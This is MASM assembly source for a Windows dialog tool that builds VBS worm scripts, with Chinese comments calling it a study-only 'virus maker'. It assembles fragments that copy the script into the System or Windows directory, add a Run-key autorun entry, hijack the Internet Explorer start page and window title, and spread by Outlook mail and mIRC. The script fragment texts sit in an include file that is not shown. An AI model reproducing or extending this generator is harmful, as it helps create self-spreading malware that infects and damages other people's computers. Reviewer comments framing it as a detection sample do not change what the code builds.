;########################################################################
;工具:radasm+masm
;radasm下载网址http://radasm.visualassembler.com/
;masm下载地址http://www.movsd.com/
;本代码仅供学习之用,不得改编成其它破坏工具
;所生成的代码是参考其他vbs病毒写成的,未经测试。作者的目的只是公开制造机的原理
;本代码适合于masm初学者学习,请参考罗云彬的《汇编语言程序设计》,及罗聪某一篇文章,beagle病毒
;########################################################################
.386
.model flat, stdcall ;32 bit memory model
option casemap :none ;case sensitive
include virgen.inc
include equfile.inc
include usefull.inc
.code
; Program entry point (flat 32-bit, stdcall): fetch the module handle,
; register the common controls, run IDD_DIALOG1 modally with DlgProc as
; its dialog procedure, and exit with code 0 once the dialog ends.
start:
invoke GetModuleHandle,NULL ;NULL -> handle of this executable
mov hInstance,eax ;kept in a global; DlgProc reads it for resources
invoke InitCommonControls
invoke DialogBoxParam,hInstance,IDD_DIALOG1,NULL,addr DlgProc,NULL ;returns after EndDialog
invoke ExitProcess,0
;########################################################################
;-----------------------------------------------------------------------
; DlgProc proc hWin:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
; Dialog procedure for IDD_DIALOG1 (stdcall, flat 32-bit model).
; WM_INITDIALOG: set icon/bitmap, cache the Windows and System
;                directory paths, fill combo IDC_CBO1 and disable the
;                optional edit boxes until their checkbox is ticked.
; WM_COMMAND:    copy each control's text into its global buffer and
;                remember the checkbox states; IDC_BTN_MAKE concatenates
;                the sz* text fragments into a heap buffer and writes
;                the result to a file named szVirName.
; WM_CLOSE:      EndDialog.
; Out:   eax = TRUE when the message was handled, FALSE otherwise.
; The sz*/Is*/h*/lp* globals are not declared in this file; presumably
; they come from virgen.inc (not visible here).
; Analysis note: judging only by the fragment names (szCopyToSystem,
; szCopyToWindows, szRegAutoRun1, szOutLook*, szMirc*), the generated
; script copies itself into a system directory, registers a Run-key
; entry and spreads via mail and mIRC. Keep this as an analysis sample;
; the artefacts it produces (a script dropped into the Windows/System
; directory plus a Run entry pointing at it) are what detection should
; look for.
;-----------------------------------------------------------------------
DlgProc proc hWin:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM
mov eax,uMsg
.if eax==WM_INITDIALOG
;Icon and bitmap for the dialog. NOTE(review): wParam of WM_SETICON is
;the resource id ICO_MAIN here rather than ICON_SMALL/ICON_BIG, and
;BM_SETIMAGE is sent to the dialog itself - presumably unintended.
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWin,WM_SETICON,ICO_MAIN,eax
invoke LoadBitmap,hInstance,BMP_MAIN
invoke SendMessage,hWin,BM_SETIMAGE,BMP_MAIN,eax
;Cache both directory paths; the MAKE branch pastes them into the output.
invoke GetWindowsDirectory,addr szWindowsDirectory,MAX_PATH
invoke GetSystemDirectory,addr szSystemDirectory,MAX_PATH
;Three location choices in the combo; first entry selected by default.
invoke SendDlgItemMessage,hWin,IDC_CBO1,CB_ADDSTRING,0,addr szCBOText1
invoke SendDlgItemMessage,hWin,IDC_CBO1,CB_ADDSTRING,0,addr szCBOText2
invoke SendDlgItemMessage,hWin,IDC_CBO1,CB_ADDSTRING,0,addr szCBOText3
invoke SendDlgItemMessage,hWin,IDC_CBO1,CB_SETCURSEL,0,0
;Optional edit boxes start disabled; the matching checkbox/combo
;handlers below re-enable them.
invoke GetDlgItem,hWin,IDC_EDT_DIR
invoke EnableWindow,eax,FALSE
invoke GetDlgItem,hWin,IDC_EDT_KEY
invoke EnableWindow,eax,FALSE
invoke GetDlgItem,hWin,IDC_EDT_OUTLOOKSUBJECT
invoke EnableWindow,eax,FALSE
invoke GetDlgItem,hWin,IDC_EDT_OUTLOOKBODY
invoke EnableWindow,eax,FALSE
invoke GetDlgItem,hWin,IDC_EDT_STARTPAGE
invoke EnableWindow,eax,FALSE
invoke GetDlgItem,hWin,IDC_EDT_WINTITLE
invoke EnableWindow,eax,FALSE
.elseif eax==WM_COMMAND
mov eax,wParam ;ax = control id, high word = notification code
.if ax==IDC_NAME
;nMaxCount is sizeof szVirName, not sizeof the destination
;szBaseVirName - confirm the two buffers are the same size.
invoke GetDlgItemText,hWin,IDC_NAME,addr szBaseVirName,sizeof szVirName
invoke lstrcpy,addr szVirName,addr szBaseVirName
invoke lstrcat,addr szVirName, addr szVirNamePatch ;szVirName = base name + szVirNamePatch (presumably a suffix)
.elseif ax==IDC_AUTHOR
invoke GetDlgItemText,hWin,IDC_AUTHOR,addr szVirAuthor2,sizeof szVirAuthor2
.elseif ax==IDC_LOCA
invoke GetDlgItemText,hWin,IDC_LOCA,addr szOrigin2,sizeof szOrigin2
.elseif ax==IDC_CHK_MIRC
invoke IsDlgButtonChecked,hWin,IDC_CHK_MIRC
mov IsMircChecked,eax ;BST_CHECKED / BST_UNCHECKED
.elseif ax==IDC_EDT_STARTPAGE
invoke GetDlgItemText,hWin,IDC_EDT_STARTPAGE,addr szStartPage,sizeof szStartPage
.elseif ax==IDC_EDT_WINTITLE
invoke GetDlgItemText,hWin,IDC_EDT_WINTITLE,addr szWindowTitle,sizeof szWindowTitle
.elseif ax==IDC_EDT_KEY
invoke GetDlgItemText,hWin,IDC_EDT_KEY,addr szRegName,sizeof szRegName
.elseif ax==IDC_CHK_AUTORUN
;Autorun checkbox gates the registry value-name edit box.
invoke IsDlgButtonChecked,hWin,IDC_CHK_AUTORUN
mov IsAutorunChecked,eax
.if IsAutorunChecked==BST_CHECKED
invoke GetDlgItem,hWin,IDC_EDT_KEY
invoke EnableWindow,eax,TRUE
.elseif IsAutorunChecked==BST_UNCHECKED
invoke GetDlgItem,hWin,IDC_EDT_KEY
invoke EnableWindow,eax,FALSE
.endif
.elseif ax==IDC_CHK_OUTLOOK
;Outlook checkbox gates the subject/body edit boxes.
invoke IsDlgButtonChecked,hWin,IDC_CHK_OUTLOOK
mov IsLookOutChecked,eax
.if IsLookOutChecked==BST_CHECKED
invoke GetDlgItem,hWin,IDC_EDT_OUTLOOKSUBJECT
invoke EnableWindow,eax,TRUE
invoke GetDlgItem,hWin,IDC_EDT_OUTLOOKBODY
invoke EnableWindow,eax,TRUE
.elseif IsLookOutChecked==BST_UNCHECKED
invoke GetDlgItem,hWin,IDC_EDT_OUTLOOKSUBJECT
invoke EnableWindow,eax,FALSE
invoke GetDlgItem,hWin,IDC_EDT_OUTLOOKBODY
invoke EnableWindow,eax,FALSE
.endif
.elseif ax==IDC_CHK_PAYLOAD
;Payload checkbox gates the start-page/window-title edit boxes.
invoke IsDlgButtonChecked,hWin,IDC_CHK_PAYLOAD
mov IsPayloadChecked,eax
.if eax==BST_CHECKED
invoke GetDlgItem,hWin,IDC_EDT_STARTPAGE
invoke EnableWindow,eax,TRUE
invoke GetDlgItem,hWin,IDC_EDT_WINTITLE
invoke EnableWindow,eax,TRUE
.elseif eax==BST_UNCHECKED
invoke GetDlgItem,hWin,IDC_EDT_STARTPAGE
invoke EnableWindow,eax,FALSE
invoke GetDlgItem,hWin,IDC_EDT_WINTITLE
invoke EnableWindow,eax,FALSE
.endif
.elseif ax==IDC_EDT_OUTLOOKSUBJECT
invoke GetDlgItemText,hWin,IDC_EDT_OUTLOOKSUBJECT,addr szMailSubject,sizeof szMailSubject
.elseif ax==IDC_EDT_OUTLOOKBODY
invoke GetDlgItemText,hWin,IDC_EDT_OUTLOOKBODY,addr szMailBody,sizeof szMailBody
.elseif ax==IDC_CBO1
shr eax,16 ;ax = notification code
.if ax==CBN_SELENDOK
;Combo index -> IsDir: 0 = system dir, 1 = windows dir, 2 = user path
;(only 2 enables the custom-directory edit box).
invoke SendDlgItemMessage,hWin,IDC_CBO1,CB_GETCURSEL,0,0
.if eax==0
invoke GetDlgItem,hWin,IDC_EDT_DIR
invoke EnableWindow,eax,FALSE
mov IsDir,0
.elseif eax==1
invoke GetDlgItem,hWin,IDC_EDT_DIR
invoke EnableWindow,eax,FALSE
mov IsDir,1
.elseif eax==2
invoke GetDlgItem,hWin,IDC_EDT_DIR
invoke EnableWindow,eax,TRUE
mov IsDir,2
.endif
.endif
.elseif ax==IDC_BTN_MAKE
;Build the output text by lstrcat'ing fragments into one heap block.
;lpOriMen = block start (kept for HeapFree); lpMen = write cursor.
invoke GetProcessHeap
mov hHeap,eax
invoke HeapAlloc, hHeap, NULL,8*MAX_PATH+10000
mov lpOriMen,eax
mov lpMen,eax
add lpMen,1000h ;Note: this offset is what keeps garbage out of the head of the generated file
;BaseInfor - header fragment plus the name/author/origin texts
invoke lstrcat, lpMen, addr szBaseInfor
invoke lstrcat, lpMen, addr szBaseVirName
invoke lstrcat, lpMen, addr szVirAuthor1
invoke lstrcat, lpMen, addr szVirAuthor2
invoke lstrcat, lpMen, addr szOrigin1
invoke lstrcat, lpMen, addr szOrigin2
invoke lstrcat, lpMen, addr szBegin
;Custom folder (IsDir==2 only): read the path from IDC_EDT_DIR
cmp IsDir,2
jnz @F
invoke GetDlgItemText,hWin,IDC_EDT_DIR,addr szNewVirPath,sizeof szNewVirPath
invoke lstrlen,addr szNewVirPath
;Normalise szNewVirPath so that it never ends with a trailing '\'.
;edx = one past the last character; al = last character (92 = '\').
push edx
mov edx,offset szNewVirPath
add edx,eax
mov al,byte ptr [edx-1]
cmp al,92
jnz @Not
mov byte ptr [edx-1],00h
pop ebx
@Not:
;invoke CreateDirectory,addr szNewVirPath,NULL  v1.2: corrected a logic error here - when there is no user-defined folder, the vbs code itself should create it
@@:
;CopyToDirectory - pick the fragment matching IsDir (0/1/2)
cmp IsDir,0
jnz @F
invoke lstrcat, lpMen, addr szCopyToSystem
invoke lstrcat, lpMen, addr szVirName
invoke lstrcat, lpMen, addr szVbsSym4
@@:
cmp IsDir,1
jnz @F
invoke lstrcat, lpMen, addr szCopyToWindows
invoke lstrcat, lpMen, addr szVirName
invoke lstrcat, lpMen, addr szVbsSym4
@@:
cmp IsDir,2
jnz @F
invoke lstrcat, lpMen, addr szCopyToDefinePath
invoke lstrcat, lpMen, addr szVbsSym
invoke lstrcat, lpMen, addr szNewVirPath
invoke lstrcat, lpMen, addr szVbsSym1
invoke lstrcat, lpMen, addr szVirName
invoke lstrcat, lpMen, addr szVbsSym
@@:
;OutLook - optional; subject, body, then the full path of the script
cmp IsLookOutChecked,BST_CHECKED
jnz @OutLookOut
invoke lstrcat, lpMen, addr szOutLook1
invoke lstrcat, lpMen, addr szMailSubject
invoke lstrcat, lpMen, addr szOutLook2
invoke lstrcat, lpMen, addr szOutLook3
invoke lstrcat, lpMen, addr szMailBody
invoke lstrcat, lpMen, addr szOutLook4
invoke lstrcat, lpMen, addr szOutLook5
cmp IsDir,0
jnz @F
invoke lstrcat, lpMen, addr szVbsSym
invoke lstrcat, lpMen, addr szSystemDirectory
@@:
cmp IsDir,1
jnz @F
invoke lstrcat, lpMen, addr szVbsSym
invoke lstrcat, lpMen, addr szWindowsDirectory
@@:
cmp IsDir,2
jnz @F
invoke lstrcat, lpMen, addr szVbsSym
invoke lstrcat, lpMen, addr szNewVirPath
@@:
invoke lstrcat, lpMen, addr szVbsSym1
invoke lstrcat, lpMen, addr szVirName
invoke lstrcat, lpMen, addr szVbsSym
invoke lstrcat, lpMen, addr szOutLook6
@OutLookOut:
;IE payload - optional; start page and window title fragments
cmp IsPayloadChecked,BST_CHECKED
jnz @F
invoke lstrcat, lpMen, addr szRegStartPage
invoke lstrcat, lpMen, addr szStartPage
invoke lstrcat, lpMen, addr szRegStartPage2
invoke lstrcat, lpMen, addr szRegWindowTitle
invoke lstrcat, lpMen, addr szWindowTitle
invoke lstrcat, lpMen, addr szRegWindowTitle2
@@:
;AutoRun - optional; value name szRegName, data = path of the script
cmp IsAutorunChecked,BST_CHECKED
jnz @RegOut
invoke lstrcat, lpMen, addr szRegAutoRun1
invoke lstrcat, lpMen, addr szRegName
invoke lstrcat, lpMen, addr szVbsSym
invoke lstrcat, lpMen, addr szVbsSym2
cmp IsDir,0
jnz @F
invoke lstrcat, lpMen, addr szVbsSym
invoke lstrcat, lpMen, addr szSystemDirectory
@@:
cmp IsDir,1
jnz @F
invoke lstrcat, lpMen, addr szVbsSym
invoke lstrcat, lpMen, addr szWindowsDirectory
@@:
cmp IsDir,2
jnz @F
invoke lstrcat, lpMen, addr szVbsSym
invoke lstrcat, lpMen, addr szNewVirPath
@@:
invoke lstrcat, lpMen, addr szVbsSym1
invoke lstrcat, lpMen, addr szVirName
invoke lstrcat, lpMen, addr szVbsSym
@RegOut:
;Mirc - optional; same directory selection as above
cmp IsMircChecked,BST_CHECKED
jnz @MircOut
invoke lstrcat, lpMen, addr szMirc1
cmp IsDir,0
jnz @F
invoke lstrcat, lpMen, addr szSystemDirectory
@@:
cmp IsDir,1
jnz @F
invoke lstrcat, lpMen, addr szWindowsDirectory
@@:
cmp IsDir,2
jnz @F
invoke lstrcat, lpMen, addr szNewVirPath
@@:
invoke lstrcat, lpMen, addr szVbsSym1
invoke lstrcat, lpMen, addr szVirName
invoke lstrcat, lpMen, addr szVbsSym
invoke lstrcat, lpMen, addr szMirc2
@MircOut:
;Trailer, then write the text to szVirName (relative to the current
;directory), release the heap block and report completion.
invoke lstrcat, lpMen, addr szEnd
invoke lstrlen, lpMen
mov len, eax
invoke CreateFile,addr szVirName,GENERIC_WRITE ,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
mov hFile,eax ;return value is not checked before WriteFile
invoke WriteFile,hFile,lpMen,len,addr nWrite,NULL
invoke CloseHandle,hFile
invoke HeapFree,hHeap,NULL,lpOriMen ;free from the block start, not from lpMen
invoke Sleep,500
invoke MessageBox,NULL,addr szText,addr szCaption,MB_ICONINFORMATION+MB_OK
.endif
.elseif eax==WM_CLOSE
invoke EndDialog,hWin,0
.else
mov eax,FALSE ;unhandled message
ret
.endif
mov eax,TRUE
ret
DlgProc endp
end start